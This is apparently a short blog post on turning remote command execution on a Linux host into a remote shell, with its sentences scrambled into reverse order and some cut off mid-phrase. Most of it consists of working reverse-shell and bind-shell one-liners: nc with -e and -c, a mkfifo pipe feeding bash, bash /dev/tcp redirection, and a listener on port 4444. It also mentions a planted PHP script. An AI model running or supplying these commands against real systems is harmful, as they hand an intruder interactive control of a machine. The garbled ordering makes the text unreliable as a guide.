If commands are running in bash, then great, we can use bash’s tcp redirections like this: bash &>/dev/tcp/DEST_IP/DEST_PORT /dev/tcp/DEST_IP/DEST_PORT <&1" Check whether commands are running inside bash with: $echo $0
If no versions of netcat are installed, we can always try bash redirection. There might also be ncat available on the system, which can be used just like nc in the first 4 examples above, and ncat provides options like –ssl which can be used to encrypt traffic and even verify identity. We can temporarily create a named pipe and use that to connect to a single nc listener: mkfifo /tmp/pipe cat /tmp/pipe|nc DEST_IP DEST_PORT|/bin/bash &>/tmp/pipe rm /tmp/pipe This is not very elegant, but it does work. One example is to use two nc listeners connected to bash, one to send commands and one to receive output: nc DEST_IP DEST_PORT | /bin/bash 2>&1 | nc DEST_IP DEST_PORT+1 If there is no -e option, there are ways around it. This example forwards stderr as well as stdout from bash: nc DEST_IP DEST_PORT -c "/bin/bash 2>&1" It may be even better to use the -c switch instead of -e if it is available because then you can pass more than an executable name to execute. BSD) don’t need the -p option if -l is specified (in fact it is not valid to use -p with -l on those versions), and some don’t have the -e option. It should be noted that some versions of nc (e.g. Or I could set up a bind shell on the system then connect to it later using nc: nc -lp 4444 -e /bin/bash Something like this should send a reverse shell to a nc listener, running on DEST_IP:DEST_PORT: nc DEST_IP DEST_PORT -e /bin/bash If nc or ncat is installed, it should be fairly simple to send the shell to my listener. Usually an nc listener would be used to receive the reverse shell, and I normally start it with the -v option so that it will show when a connection is received. Often when I get remote command execution on a linux system for example I’ve planted my one line php script, the next step is getting a remote shell.
0 kommentar(er)
